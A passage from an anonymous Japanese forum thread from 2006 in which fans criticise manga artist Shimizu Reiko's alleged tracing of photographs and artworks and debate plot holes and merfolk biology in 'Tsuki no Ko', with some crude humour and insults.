で、そのダンサーの写真をマルっとパク
それがシミズン・クオリティ…

239 :花と名無しさん:2006/09/21(木) 22:10:12 ID:???O
家具屋の15巻、戴冠式で王が倒れてる場面がラファエロのピエタに似てる。

240 :花と名無しさん:2006/09/21(木) 22:51:02 ID:???O
と、思ったけど、若干構図が似てる程度でした。ごめん。

241 :花と名無しさん:2006/09/21(木) 23:56:05 ID:???0
まぁ、ラファエロあたりまでパクとか言い出したら
この現代にオリジナルは皆無になってしまう。

242 :花と名無しさん:2006/09/22(金) 15:21:43 ID:???0
Wikiの清水玲子の項目書いたのここの住人だろ…

243 :花と名無しさん:2006/09/22(金) 16:15:57 ID:???0
斬新な構図でなくてもいいけど、変にどこかからキリバリして持ってくるので
そこだけどんどん浮き上がるようになってない?

特に写真のマネの多い家具屋は酷い。無残。


244 :花と名無しさん:2006/09/22(金) 23:54:36 ID:???0
>241
パクリはパクリ。
時代は関係ない。

245 :花と名無しさん:2006/09/23(土) 15:47:04 ID:FwmFq2Mw0
そんじょそこらの漫画家さんより私は好きだなあ。

246 :花と名無しさん:2006/09/23(土) 16:46:16 ID:???0
そういう人はいいんじゃない。パク利を継ぎ接ぎする能力が好きということもあるし。

247 :花と名無しさん:2006/09/23(土) 20:36:34 ID:???0
>>245
すごい言い方だなw
うーん、パクリを別にしても話自体がどうしようもないな、最近のは。
つか家具屋以降は。
(まぜ前提としてパクリが気色悪いんだけど)

家具屋以前も読み返すと首を傾げることが多く……自分が厨2病だったので
その症状に適応してたんだと思う。


248 :花と名無しさん:2006/09/23(土) 21:23:34 ID:???0
家具や読み返すと、「主人公の女の子に群がる、あるいは周辺で絡みあう
さまざまなタイプの違う美青年美少年たち」になってて泣ける
ストーリーはいうまでもなく破綻
キャラの行動や心情や動機に説得力が皆無

泣けた

249 :花と名無しさん:2006/09/23(土) 21:59:46 ID:???0
家具屋以前は「?」と感じる部分はあっても割とスルーできる程度の
破綻だったと思う。家具屋でなんでこんなになっちゃったかな、と考えていたら
実は重度のパクラーだったことを知る。


マジで泣けた。

250 :花と名無しさん:2006/09/23(土) 22:35:23 ID:???0
パク自体が悪いだけじゃなく、パクでどんどん劣化したんだよな。


251 :花と名無しさん:2006/09/23(土) 22:42:40 ID:???O
月の子までは個性的で好き
たとえ何かをパクっていたとしても馴染んでる

252 :花と名無しさん:2006/09/24(日) 16:12:00 ID:???0
最近、ン年ぶりに月の子を読み返してみたんだが
大人になってから読むとストーリーのアラが目立つな。

○女性化してなくてもセツが妊娠できるなら、ベンジャミン恨む必要ねー
○産卵期終わったら全員死ぬんじゃないの?グランマは例外としても
 セツや三つ子を育てた姉妹ママは一体?


253 :花と名無しさん:2006/09/24(日) 19:54:48 ID:???0
セツが卵を産んだのは、ベンジャミンが起こした奇跡(人間になる)と、
魔女が運命変えたのと、どっちかが効力を発揮したんじゃないかと思う。

ミランダとサラが生きてたのはなんでだろーね。たまたま彼女たちも例外に
生き残る人魚で、あのまま生きてたらグランマみたいになる、とか?

それにしても、今まで住んでた星での生活をすべてぶっちぎって、えんえん
宇宙を泳いで地球にきて相方見つけて卵産まなきゃなんて(しかも産まないと
死ぬ)すごい宇宙人だよなぁ人魚。

254 :花と名無しさん:2006/09/24(日) 23:13:54 ID:???0
え?産んでも産まなくても死ぬんじゃなかったっけ?

コレも追加
○ティルトはセツに卵を産ませたいが為に原子炉の事故を起こそうとするが
 地球が死の星になったらセツも卵産めない、とか考えなかったのか?
 もし遠い場所でなんとか産めたとしても、セツの子供、孫のこととか関係なしか?

255 :花と名無しさん:2006/09/25(月) 00:08:39 ID:???0
月面で産卵できる様にする計画がある、と取ってつけた様な設定が。
確かギルが車椅子転がしながらそんなことをつぶやいてた。

てか、きょうだいの内一人だけが女性化して他は育児係になる、という
クマノミ型繁殖システムはセイラ、ミランダの世代にもあった訳だから
人間との混血によって突然生じたものではないよね?
なのにグランマや周囲の人魚達はそのシステムを理解してない様子だった。
ストーリーの都合としても、
「人魚界では珍しいクマノミ型繁殖システムが産む近親憎悪」ではなく
「人魚と人間の混血化が生んだ謎と悲劇」てカンジを狙ってたんだろうから、
これはどう見ても設定ミスです。ありがとうございました

256 :花と名無しさん:2006/09/25(月) 00:45:43 ID:???0
大体何だよ、あの魔女って。

……と、当時あの辺で萎えた。

自分は当時小学生。
何故か学校と地元図書館に画集類が少なかったけど絵が好きで、絵画
集的な興味でツチノコ見てて、後からパク元知って愕然としたなあ。


257 :花と名無しさん:2006/09/25(月) 08:59:11 ID:???O
月の子も家具屋も一応SF?
雰囲気やキャラ萌表現は非常に上手いと思うけど、細かく筋の通った設定を考えるのは苦手そうだ

258 :花と名無しさん:2006/09/25(月) 11:52:29 ID:???0
○女性化してなくてもセツが妊娠できるなら、ベンジャミン恨む必要ねー
たまたま女性化前にセクース→アートが自分よりもジミーを想う力でジミーが人間になる
→代わりにセツが女性化→体内に残っていた子種で妊娠
と思われるのでやっぱり女性化は必要なのでは。
○産卵期終わったら全員死ぬんじゃないの?グランマは例外としても
セイラの姉妹もグランマに較べれば短命…だけど産卵期過ぎて数百年も生きてて今更苦しいw
そういやセツの寿命もなんかおかしかったな。
○クマノミ型繁殖システムはセイラ、ミランダの世代にもあった
セイラの姉妹は産卵できる体だけどあえてせず、妹の子を育てたように言ってた。

「人魚界では珍しいクマノミ型繁殖システムが産む近親憎悪」と「人魚と人間の混血化が生んだ謎と悲劇」は
両方狙ってると思ってたんだけど偶然かもねー。

259 :花と名無しさん:2006/09/25(月) 15:41:24 ID:???0
>>256
今思えば、魔女はセツを生き返らせたり、卵産む運命をゆがめたりできるんだから、
人類イラネと思うんだったらティルトに頼まず自分で滅ぼせばいいのにね。

260 :花と名無しさん:2006/09/25(月) 15:43:09 ID:???0
>○女性化してなくてもセツが妊娠できるなら、ベンジャミン恨む必要ねー
>たまたま女性化前にセクース→アートが自分よりもジミーを想う力でジミーが人間になる
>→代わりにセツが女性化→体内に残っていた子種で妊娠
>と思われるのでやっぱり女性化は必要なのでは。

これの、ここ↓と
>→アートが自分よりもジミーを想う力でジミーが人間になる

これ↓
>→代わりにセツが女性化→体内に残っていた子種で妊娠

が必然なのか偶然なのかだな、問題は。
思いつきで適当に書いてそうだしな。

セクースの場面を見る限りではジミー人間化は想定外のことみたいなので、
あれはやっぱセツが女性化しなくても妊娠できると思ってやってるような希ガス。


261 :花と名無しさん:2006/09/25(月) 20:07:31 ID:???0
月の子最終回についてのコラムで、当時のコミックボックスが非常に上手く
解説していた。はっきりいって、本編テキストよりも感動する解釈だった。
ああ、こういう落ちだと思えばいいのか、と思った。
ものは言い様だな、と。

262 :花と名無しさん:2006/09/25(月) 20:13:00 ID:???0
へぇ、どんなの?

263 :花と名無しさん:2006/09/25(月) 20:33:17 ID:???0
>>260
ショナは子供残すためにやったんじゃなく、単に恋愛行為としてやった。
ジミー人間化は本人達には全く想定外で、そもそも子供ができたことが想定外
(でも幸せ)。

自分はそう考えてるからセツ女性化は妊娠に必須だと思ってたんだが。

264 :花と名無しさん:2006/09/25(月) 22:20:07 ID:???0
わざわざ「解釈」しないと理解も出来ないような糞マンガなんだなと
しんみりしてきた。


265 :花と名無しさん:2006/09/25(月) 22:50:27 ID:???0
アートが人類よりジミーを選んだことにより
ジミー人間化→人魚のベンジャミンは死んだ→セツが女性化する順番が来た
で何の不思議もないと思うけど・・・
たまたま完全に女性化する前にショナとエッチしてたから
子供が出来ちゃっただけ(これが少し腑に落ちないけど)
女性化する前のセツは胸はないけど穴はあったんだなw
両生体というより初潮前の少女みたいな感じだろうか




266 :花と名無しさん:2006/09/25(月) 23:11:30 ID:???0
>たまたま完全に女性化する前にショナとエッチしてたから
>子供が出来ちゃっただけ(これが少し腑に落ちないけど)

まさにそこがおかしい。

穴がどうのこのもだが、長生きな精子だこと……


267 :花と名無しさん:2006/09/25(月) 23:18:42 ID:???0
人魚の精子は人間のとは違うんだろう。

268 :花と名無しさん:2006/09/25(月) 23:29:38 ID:???0
セツとショナがエッチしてから
セツが女性化するまでそんなに時間経ってないよ
せいぜい一晩くらいしか
それくらいだったら人間の精子だって生きてるよ
セツが女性化してすぐ妊娠してもおかしくないよ

269 :花と名無しさん:2006/09/25(月) 23:39:57 ID:???0
ワケワカラン話だな。FTなのかSFなのか。

そのどっちにしたって設定がいい加減。

魔女がホントワケワカラン存在だった。


270 :花と名無しさん:2006/09/25(月) 23:54:59 ID:???0
>>262
書いたのは藤本由香里。前文を略したのを紹介します。

(前文略)ラストは一体どうなるんだろうと少しばかりの戸惑いを覚えながら見つめていた
我々の前に、最終回、二通りの未来が平行して描き出される。
アートもショナもセツも全て死に、あの事故を契機に全てが滅びに向かう胸が締め付けられ
そうなシナリオと、結局事故は起こらず、奇跡によってジミーは人間に、ショナの卵を
女性化したセツが産み、原子力に変わるクリーンなエネルギーが開発されて、人類の前に
ようようたる未来が開けるシナリオと。
ああ、良かった、と、アートの心臓が止まった映像に変わって明るい未来の姿が
描き出された時、私たちは掛け値なしにそう思う。ラストシーンでアートはジミーに
囁く。人が死に森が焼かれ、オゾン層が破壊され生き物は滅んでいった、それは
みんな夢・・・。
でも私たちは知っている。もう既に事故は起こってしまった。
私たちに選び取れるのはここには描かれていない、第三の未来だけなのだ。

271 :花と名無しさん:2006/09/25(月) 23:58:47 ID:???O
ヒトでは中田氏後1、2日、鳥類ではもっと生きるらしい<精子

魔女は人魚姫をモチーフにした以上出さざるを得なかったのだろう。家具屋の唐突な晶昇天みたいなもの。魔女にしろ昇天にしろもうすこし上手い見せ方はなかったものか…

272 :花と名無しさん:2006/09/26(火) 00:05:46 ID:???0
H後から女性化まで一晩程度だったっけ。そう言われればそうだったかも。
単行本売ってだいぶ経つんで忘れてた。

273 :花と名無しさん:2006/09/26(火) 00:12:03 ID:???0
萌えにしたがって描いてるから、最初の頃からは方向性が変わってしまってたよね。
一巻にでてくるショナの彼女の半魚人の女とか、最初は相当いい加減なファンタジーっぽい要素が
強かった。
そのうち、あの頃の時代的に流行った群像劇を映画かなんかで観たんだろ。

274 :花と名無しさん:2006/09/26(火) 00:56:13 ID:???0
辻褄が合わない部分があったら「SFじゃなくてFTだからw」
アクションシーンが寒くても「少女マンガだからw」

常に逃げ道を用意してるように見える。

275 :花と名無しさん:2006/09/26(火) 07:17:07 ID:???0
>>270
過剰に受け取りすぎてる感じだなあ。


276 :花と名無しさん:2006/09/26(火) 10:58:35 ID:???0
ファンタジー設定には無粋で下品な直球疑問…
アナルセックスで直腸に放り込まれた精子が
どんなミラクルで膣〜子宮まで移動するのでしょうか?

277 :花と名無しさん:2006/09/26(火) 11:00:32 ID:???0
ま、所詮マージナルの二番煎じってことで。
「対応した」んじゃないのw

278 :花と名無しさん:2006/09/26(火) 13:10:11 ID:???0
手元にあるなら貫通した時の場面をみてごらん
入ってる角度からしてアナルではないとオモワレ
男じゃないことを度々強調してたから、穴はあったんだよきっと

279 :花と名無しさん:2006/09/26(火) 13:39:39 ID:???0
人魚穴があるんじゃないの?
姿は人間だけどやつらは宇宙人だ

280 :花と名無しさん:2006/09/26(火) 13:47:22 ID:???0
↑と、書いて思ったが、三つ子だけユニセックスなのも妙な話だよね。
他の人魚は一応性別あるっぽいし。
人間との混血だからと言われればそれまでだが…

281 :花と名無しさん:2006/09/26(火) 13:52:00 ID:???0
そこでクマノミシステムですよ。

282 :花と名無しさん:2006/09/26(火) 14:28:50 ID:???0
>>279
BLでありえないセックスを出来る穴を801穴と言うそうだけど。

そんなもんなんだな、あのマンガも。


283 :花と名無しさん:2006/09/26(火) 14:54:09 ID:???0
貫通した場面なんてあったっけ?

上のレスであったように穴はあるけど初潮前で、女性化の際に
通じた(この表現が適切かはわからないが)から妊娠と思ってたよ

284 :花と名無しさん:2006/09/26(火) 14:58:48 ID:???0
つーか何でセクースしたんかなあ。

ぶっちゃけ何か苦手、あの場面。
恋愛というと「?」が残り、妊娠目的とするとエグ杉。


285 :花と名無しさん:2006/09/26(火) 15:30:56 ID:???0
シュワちゃんのコメディ映画みたいに、小腸の隙間を子宮代わりにしたんじゃないの?
受精は体外受精。魚と同じくぶっ掛けシステムで直腸内で受精。
頑張って卵が遡る。

286 :花と名無しさん:2006/09/26(火) 15:32:25 ID:???0
どっちにしろ読者がすごい善意で頑張って解釈しないと成り立たんような
設定やよね……



287 :花と名無しさん:2006/09/26(火) 16:30:55 ID:???0
>>285
そんなことしたら女性化しなくても産めちゃうんじゃ

288 :花と名無しさん:2006/09/26(火) 18:00:06 ID:???0
読者がすごい善意で頑張って解釈しても、


またひとつ新しい突っ込みどころが出来ただけだったのですた。

289 :花と名無しさん:2006/09/26(火) 19:20:45 ID:???0
女性化しないと卵が出てこないんだよ!ってこと?

290 :花と名無しさん:2006/09/26(火) 20:43:17 ID:???0
普通そうでしょ?
人間の女だって初潮がこないと妊娠できないじゃん
外見は女だけど中身がまだ女になっていない状態
セツは棒と穴と両方あるんじゃないかな
両方とも未成熟の状態で

291 :花と名無しさん:2006/09/26(火) 20:55:29 ID:???0
>>284
苦手なんで読み飛ばしたら話が分からなくて
でもなんかどうでもよくなって
一応は最後まで買ったんだけどそのまま全巻売ってしまったなぁ

292 :花と名無しさん:2006/09/26(火) 22:18:12 ID:???0
ちょwwwセツふたなりですか

293 :花と名無しさん:2006/09/26(火) 22:18:38 ID:???0
ジミー←→アート、ショナ←セツ←ティルト←リタの愛情は解ったけど
ショナ→セツが運命変えるほど深い愛情だったのかどうかが伝わってこなかった。

かといってショナ←→セツのラブラブ描写を延々やられても
801不得手な自分には辛かったかも……どうしたもんかね……

294 :花と名無しさん:2006/09/26(火) 22:20:59 ID:???0
棒があったら女の人魚見つけて子供作れちゃうじゃないか…

295 :花と名無しさん:2006/09/26(火) 22:21:53 ID:???0
と思ったけど精子なさそうだね。ごめんね。

296 :花と名無しさん:2006/09/26(火) 22:23:12 ID:???0
その説でいくと
ティルトには穴がなかった→産卵できない体だったって事かな

297 :花と名無しさん:2006/09/26(火) 22:30:32 ID:???0
ティルトは最初から卵細胞がないんだったよね
じゃあ女性化はあきらめて女と恋愛すればいーじゃんと
思ってたけど精子もないのか
あの三つ子は見た目は男なのに女性化して卵を産むとか
言ってるから男性のままで人魚の女に卵を産んでもらうという
選択はないのか?と思ってたけど
奴らは卵細胞しか持ってないのね
精子は作れないから男になって女に卵を産ますという
選択ができなかったのか

298 :花と名無しさん:2006/09/26(火) 22:32:06 ID:???0
つまり
ジミーとセツは未成熟な両性具有→成熟すればどっちかに性別固定、産卵可能で
ティルトは未成熟な棒のみ→産卵不可、という結論?
それはそれで、ジミーはともかく
ティルトとセツはあの外見で想像すると微妙だな…。

299 :花と名無しさん:2006/09/26(火) 22:33:36 ID:???0
三つ子は「姉妹」という表現をしていなかったか?
自分は今までずっとそう思ってた。

300 :花と名無しさん:2006/09/26(火) 22:40:37 ID:???0
棒は三人とも無いって事ですか。
卵細胞ありの二人は初潮前の少女(でも外見は少年寄り)のような感じで
ティルトはエレナみたいに無性なのかな。

301 :花と名無しさん:2006/09/26(火) 22:45:36 ID:???0
三つ子は顔は綺麗だけど肩幅とかがガッシリしてて
骨格が男っぽいんだよな
それで棒がないってのもアンバランスw
ジミーはどんどん縮んで小さい子供になったから気にならないけど


302 :花と名無しさん:2006/09/26(火) 22:55:09 ID:???0
久しぶりに覗いてみれば
何故かスレ住民が真剣に穴だの棒だの連呼してるw
思わずキーボードに緑茶吹いちゃったじゃないか

303 :花と名無しさん:2006/09/26(火) 22:57:55 ID:???0
じゃあなんで少年っつーか、セツとかあんな男外見なんだろうな。

中性越して大分男っぽかったんで901っつーかBLっぽくて萎えた。
もっと設定にあわせて中世的ならマシだった。



あー!もうどうせ、あの時萌えてただけのせいなんだろうけどな!
考えるのも馬鹿馬鹿しいw


304 :花と名無しさん:2006/09/26(火) 23:02:45 ID:???0
作者の趣味としか言いようがない

305 :花と名無しさん:2006/09/26(火) 23:06:04 ID:???0
作中の鍵となる一番大事な設定でさえこのザマだもんな……

本当はジミーは1巻冒頭の路線で中性的な綺麗な少年でやるはずだった
のを変えちゃってるしね。


306 :花と名無しさん:2006/09/26(火) 23:06:39 ID:???0
>じゃあなんで少年っつーか、セツとかあんな男外見なんだろうな。

だってあの作者だもの。
中性と言いつつ外見は少年ぽいって、エレナもじゃん。

307 :花と名無しさん:2006/09/26(火) 23:08:21 ID:???0
つくづく、クソだなと思い知るのだったorz



308 :花と名無しさん:2006/09/26(火) 23:11:15 ID:???0
でも少女漫画だと両性体って設定だと
少年っぽい体格と性格のキャラが多いね
それで男と恋に落ちる
やっぱり801狙いなんだろうか
セツは外見は男だけど性格とか女っぽかったんで
ショナとの恋愛はそれほど801には感じなかったな
エレナはダメだけど…作者が狙いすぎてて気持ち悪いと思った

309 :花と名無しさん:2006/09/26(火) 23:13:55 ID:???0
ジミーはウェーブで明るい金髪、
セツはストレートでちょい暗めの金髪
なんで女性体になると違いが出るのか、いまだに不思議です。

310 :花と名無しさん:2006/09/26(火) 23:22:42 ID:???0
ミラーとか薪さんとか、男と明言されてるキャラに
男が萌え萌えしてるような描写もあるんだから
明らかにソッチ系匂わせてるだろう。
中性キャラはあれだ、作者が「中性だから801じゃないよ☆」と
予防線張ったはいいが、外見が中性と言いつつ単になよっちい少年なんで
読者的にはどう見ても801です、ありがとうございました。

311 :花と名無しさん:2006/09/26(火) 23:39:27 ID:???0
>>308
中性的、の表現として少年っぽさが出るのは当たり前という気がする。
狙いがどうのじゃなくて、実際に「中世的」と評される人ってそんなだし。
初期晶みたいな感じの。

でもセツは中性ってよりは「男」っぽくて、背も高かったし大人体型だっ
たので、一見普通にホモだった。

801自体が駄目な人にはすまんが、自分はそれよりもあのテケトーさが
駄目……801でもちゃんと恋愛のドラマになってて切なさとか嬉しさが
あったら読めるんだけどねー。


312 :花と名無しさん:2006/09/26(火) 23:44:16 ID:???0
恋愛模様を描くのが苦手というか、出来ないんだよねシミズンは

全部中途半端でgdgd

313 :花と名無しさん:2006/09/26(火) 23:45:22 ID:???O
竜、月の頃は一応予防線はるくらいの奥ゆかしさはあったのに
家具屋、秘密で本番なしとは言えついに趣味炸裂かよシミズン…

>309
ティルト(大)とセツ(大)も多分微妙に顔描き分けてる。
三つ子でも100%コピーみたいにはならないってことじゃ?

314 :花と名無しさん:2006/09/27(水) 00:17:43 ID:???0
恋愛がかけないので余計にキワモノに走るんだろうな。


315 :花と名無しさん:2006/09/27(水) 01:12:33 ID:???0
萩尾望都くらい描ければ
キワモノも賛辞の対象になりうるのにね

316 :花と名無しさん:2006/09/27(水) 01:57:18 ID:???0
そういえばアートの元彼女、最初はアートと付き合ってた事実を
なかったことにしたい、とまで思っていたはずなのに
なぜ途中から急にアート一本になったんだろう。

後半はアートが将来有望株になったから分かるんだけど
ジミーが現れてすぐの頃は理由が全く描かれてなかったよね?

317 :花と名無しさん:2006/09/27(水) 02:56:07 ID:???0
>>315
うわー、何かそれは……

そして萩尾さんのはキワモノには感じなかった。
どれのこと?


318 :花と名無しさん:2006/09/27(水) 09:17:58 ID:???0
>>316
最初はダンサーとしてアート>>>ホリー、でホリーはあこがれてる面もあって
同棲。アートが伸び悩み中にホリーの才能(努力もあって)開花、アートがひがんで
どんどん険悪ムードになった。
ので、ホリーはアートを本質的にはずっと好きだったんだと思う。

319 :花と名無しさん:2006/09/27(水) 10:55:05 ID:???0
>>317
残酷な〜じゃね?
オヤジがキワモノだっただろ、あれ

320 :花と名無しさん:2006/09/27(水) 11:02:03 ID:???0
萩尾の場合は清水と違って「キワモノ描くこと自体が目的」じゃないからだろうな。

321 :花と名無しさん:2006/09/27(水) 11:16:22 ID:???0
>>315は萩尾さんはキワモノ系を描きながら、キワモノとは言えない
領域にまで達している、と言う事を言っているのでは。
ホモ、少年売春、性的虐待、近親相姦、性的倒錯とか。
ラノベやエロゲと澁澤龍彦の違いじゃない?

322 :花と名無しさん:2006/09/27(水) 13:20:44 ID:???0
子供の製造過程も腑に落ちないが、
名前がティルトなのもいまいち腑に落ちない。
ティルト自身は卵を産めない故に、
自分のために魔女と契約し転生までしたことを知ってるなら
「次は君の番」もまだ納得いくけど。
セツにしてみれば失踪したと思っていたら
ギルの車にはねられてあぼーんという程度の認識しかないはずなのに。
どうせならセツが自分が生き返らされたことを知って自分の存在に悩むものの、
それでも卵を産んでティルトの思いを成就させるっていう方がいい。


323 :花と名無しさん:2006/09/27(水) 15:28:16 ID:???0
ティルトみたいにしっかりした子にしたい、とか前に言ってなかったか?

でも、セツ、死ぬほど苦しかった(実際、一度死んだし)のに、ある日目が覚めてみたら
健康体になっててティルトは失踪してました、って状況を、もっと疑問に思うべきなのでは?
ぼんやりしすぎ。

324 :花と名無しさん:2006/09/27(水) 16:00:01 ID:???0
>>319
あれはキワモノじゃなく「異常者」だなあ。

キワモノっていうとエログロだけが目的とか、ちょっとイロモノとかニュアンス
変わるような……325は321の意図と思った。


ドロミズは「見て見て!ホラ!ゴロよ!グロ!少女マンガ家なのにこんなグロ
なの書いちゃうんだから!」というはしゃいだ雰囲気がきっつい。


325 :花と名無しさん:2006/09/27(水) 16:35:44 ID:???0
しかもそのグロとか、「少女マンガっぽくない」演出部分がほぼ全部
パクリだからどうしようもない。



326 :花と名無しさん:2006/09/27(水) 23:38:13 ID:???0
女性化したジミーとセツの髪の色の違い。
シミズンが金髪線を描くのが面倒になったから、と思ってました。

327 :花と名無しさん:2006/09/27(水) 23:50:32 ID:???0
それもあるかも知れない。
それにしても髪型違うのにベンジャミンだと思いこんでいたショナはニブ杉。
しかもあんなペラペラシャツ一枚の格好で歩いてきたのを
不思議に思わんのか。

328 :花と名無しさん:2006/09/28(木) 00:07:19 ID:???0
目がよく見えなかったんじゃ。

329 :花と名無しさん:2006/09/28(木) 00:24:06 ID:???0
最初は見えてた。会った途端に怪我したけど。

330 :花と名無しさん:2006/09/28(木) 00:44:33 ID:???0
>会った途端に怪我

ホント、どこまでもご都合主義……


331 :花と名無しさん:2006/09/28(木) 16:01:31 ID:???O
伸びてるので、新たな燃料が投下されたのかと思いましたが、性教育のお時間だったのですね。
ジミーがちぢむのに比例して、凄ぇ勢いでホリーが老けて行ったのが、最初に感じた違和感でした。

332 :花と名無しさん:2006/09/28(木) 16:30:10 ID:???0
老けたホリーよかったじゃん…
物語からあっさり退場して非常にガカーリですた。

333 :花と名無しさん:2006/09/28(木) 18:37:40 ID:???0
ホリーとかまゆとか、上手に描ければいいキャラになりそうなのにねえ

334 :花と名無しさん:2006/09/28(木) 19:15:26 ID:???0
追い詰められて暴走するか、
うじうじ悩む香具師しかいなかったツチノコ終盤の
良心みたいなものだったのにな…<ホリー

335 :花と名無しさん:2006/09/28(木) 19:56:24 ID:???0
作者が連載開始当初は女性ダンサー萌えだったけど
途中で飽きたんでしょうな。

336 :花と名無しさん:2006/09/28(木) 21:05:31 ID:???0
連載当初の構想では「素直になれない恋人たち(アートとホリー)の仲を
ベンジャミン他が取り持つファンタジー」になる予定だったんだから
そりゃまあいろいろ変わってますわな。

337 :花と名無しさん:2006/09/28(木) 21:08:00 ID:sAShGSTo0
>>336
そうなんかい!?

ホリーは尽きの子の中で一番好きなキャラだったから、
最後の扱いがひどい…せめて、何年後かのラストに
出してくれりゃよかったのに…

338 :花と名無しさん:2006/09/28(木) 21:09:15 ID:???0
作者に飽きられたキャラは話の途中だろうが何だろうがポイ捨てです。
お気に入りキャラのためならストーリーだって捻じ曲げます。
それがシミズンクオリティ

339 :花と名無しさん:2006/09/28(木) 21:37:13 ID:???0
>>337
連載終了後の作者インタビュー(ただで配ってる小冊子)でそんな風に
言ってた。初回分を描いた後で気が変わったらしく、
「だから最初の回はショナが出てませんw」とかね。

340 :花と名無しさん:2006/09/28(木) 21:39:49 ID:???0
ストーリーを捻じ曲げたわけじゃなくて
「素直になれない恋人たち(アートとホリー)の仲を ベンジャミン他が取り持つファンタジー」
とやらは単なる初期設定ではないの?
どう見ても最初から人魚姫をモチーフとしたジミーとアートの恋物語
にしか見えんが・・・ホリーは王子と結婚した人間の姫だよね
ホリーはライバルキャラの王道だと思う
途中退場してもおかしくないキャラだったよ

341 :花と名無しさん:2006/09/28(木) 21:42:42 ID:???0
そんな必死で擁護せんでも。
月の子でも家具屋でも、作者途中で飽きたのバレバレだし

342 :花と名無しさん:2006/09/28(木) 21:49:25 ID:???0
そうか?
家具屋は途中で飽きた…っつーかオチのつけ方が解らなくなった感があるけど
月の子は一応最後まで描ききったと思うよ?


343 :花と名無しさん:2006/09/28(木) 21:52:29 ID:???O
>>332
説明不足ごめん
老けたホリーが嫌なんじゃなくて、イキナリ顔違って違和感て意味。
ジミー女性化の後付けで(ベンジャミンと区別するために)ホリー老けさせたんですかね。

344 :花と名無しさん:2006/09/28(木) 22:04:02 ID:???0
>>336
ウェエエエエエエエエエエエエ!!!!!!

……ドロミズのって「構想」じゃなくて本当に「妄想」なんだな。



345 :花と名無しさん:2006/09/28(木) 22:31:13 ID:???0
>>344
そんな嘔吐する内容か?ww
人間関係のひずみをファンタジー的存在がとりもつって割りとよくある
設定で、妄想とまで呼ばれるもんじゃないと思うが。

まぁ、すぐに方向転換したんだから、構想とは呼べないな。

346 :花と名無しさん:2006/09/28(木) 22:56:05 ID:???0
>>345
いや、嘔吐じゃないし。

まさか初期構想とはいえ、
>「素直になれない恋人たち(アートとホリー)の仲をベンジャミン他が取り持つファンタジー」
だなんて……という衝撃を受けた。

しかし言われてみればいきなりホリーの顔とか性格変わったし。
ジミーは言うまでもなく。

ホント、どこまでもいい加減だな、汚水……


347 :花と名無しさん:2006/09/28(木) 23:23:50 ID:???0
ジミーもホリーも性格とかはべつに変わってないと思うけど
確かに顔は変わったけどね
ジミーはどんどん縮みホリーはどんどん老けたw
でもいきなり変わったわけじゃなくて徐々に変わっていったような…
まぁ長期連載では絵柄が変わってしまうこともあるんで
そこまで叩くほどのことでもないでしょ

348 :花と名無しさん:2006/09/29(金) 00:41:57 ID:???0
顔のパーツの描き方や、顔が扁平(横広がり)になったりっていうのは
よくある絵柄の変化だけど
シミズンの場合は絵柄変化云々以前の問題だと思うよ
7頭身(一巻ジミー)→3〜4頭身(最後の方のジミー)とかありえない

349 :花と名無しさん:2006/09/29(金) 01:55:14 ID:???0
>>347
叩きじゃないんじゃない?
指摘でしょ。

連載期間にゆっくり変化ならいいけど、ホリーは一気に老け込んだな。
ジミーも数回でいきなり縮んだ。

性格も変わったよー!特にジミー、1話目は別人だよw


350 :花と名無しさん:2006/09/29(金) 09:23:58 ID:???0
1〜3話目くらいのジミー、けっこう萌えるかもしれん、と今思った。
神秘的な美少年で記憶喪失。
あのままのキャラで進んだらけっこう違う話になってそうだ。

351 :花と名無しさん:2006/09/29(金) 12:42:43 ID:???0
それでアートやショナとフォモるのは勘弁してください orz

352 :花と名無しさん:2006/09/29(金) 15:08:51 ID:???0
あのままいったらどうせBL路線だっただろうな。
所詮汚水。


353 :花と名無しさん:2006/09/29(金) 15:51:41 ID:???0
BL無理でそ。
家具屋でチャレンジして玉砕してるし。

354 :花と名無しさん:2006/09/29(金) 15:58:42 ID:???0
>>353
「路線」だろ、あくまでも。
そっち「系」みたいな。

BLにしろレズにしろ普通の男女にしろ、恋愛自体を描けない人だし。


355 :花と名無しさん:2006/09/29(金) 17:23:12 ID:???0
恋愛未満のそこはかとない描写が上手いかといえばそうでもないしな…

…なのに無駄に憧憬とかを散りばめようとするからgdgdになるんだよ
恋愛描けないなら、恋愛なしな作品にすりゃいいのにね

356 :花と名無しさん:2006/09/29(金) 19:00:39 ID:???O
月の子は、今でも好きなんだけど。
家具屋は、途中でウンザリした。ユイ→ミドリ、サットン→ミラーの異常な執着が気持ち悪くて。

357 :花と名無しさん:2006/09/29(金) 22:00:32 ID:???0
「異常な執着」つながりで「秘密」が生まれたわけか。
「秘密」から何が生まれるかな。

358 :花と名無しさん:2006/09/29(金) 22:40:20 ID:???0
「秘密」はあのすごいパクリを産んだじゃない。

わざわざ決めゴマで延々とラ・スコペラの大々的なパクリを……



359 :花と名無しさん:2006/09/30(土) 00:19:48 ID:???0
ラ・スコペラはさすがに引用元載っけてたし。
それでも真似すぎだけど。
あれ、秘密読んだあと学校の図書館で元ネタ本たまたま読んで
びっくらこいたんだよなぁ…「これか!」みたいな

360 :花と名無しさん:2006/09/30(土) 00:51:18 ID:???0
>>359
過去ログ読んでおいで。

クレジット表記がスコペラの博物館サイトにある程度の基準でも書かれてない。
更に写真家の「作品」の模写なんだよ。
(画材が同じ「戦士」でも誰もキャパの写真をそのまま模写していいとは思わん、
そんなレベル)
しかも亡くなられている写真家のね。

しかもあの引用も最初は表記されてなかったし。
「引用」とは違うしな。


361 :花と名無しさん:2006/09/30(土) 03:16:19 ID:???0
>>360
ああ、そうなんだぁ。親切にありがとう。
誰かに突っ込まれてしぶしぶ「本の名前だけでものっけとくか」て感じなんかな。
色々と言いたいが、画家や写真家に対する敬意が微塵も感じられないのには
呆れてしまうね。
田中一村がこないだ日曜美術館でちらっと再放送されてたが、
もともと田中一村ファンの自分には、
清水に対して怒りと言うより悲しみの方が強いなぁ。
思い入れのある画家が、こんな扱いを受けるのかと。

362 :花と名無しさん:2006/09/30(土) 10:36:33 ID:???0
>画家や写真家に対する敬意が微塵も感じられない

ホントにね。パク自体は厳密にはNGだけど、好きで好きで自分の
作品にどうしても使いたい、この世界観を描きたい、という理由なら
微笑ましく思えたのに。
ただの資料集(好きな画家さんとかで名前をあげてないところが
いやらしい)としてしか見てないことが丸わかり。

363 :花と名無しさん:2006/09/30(土) 11:07:34 ID:???O
ホント資料集扱いだよね。
天女来襲(だっけ?ウロすまん)の天女が病鉢巻してるのに萎えたわ。
ちゃんと調べればいいのに

364 :花と名無しさん:2006/09/30(土) 23:55:25 ID:???0
>天女が病鉢巻

なんで萎えたの?

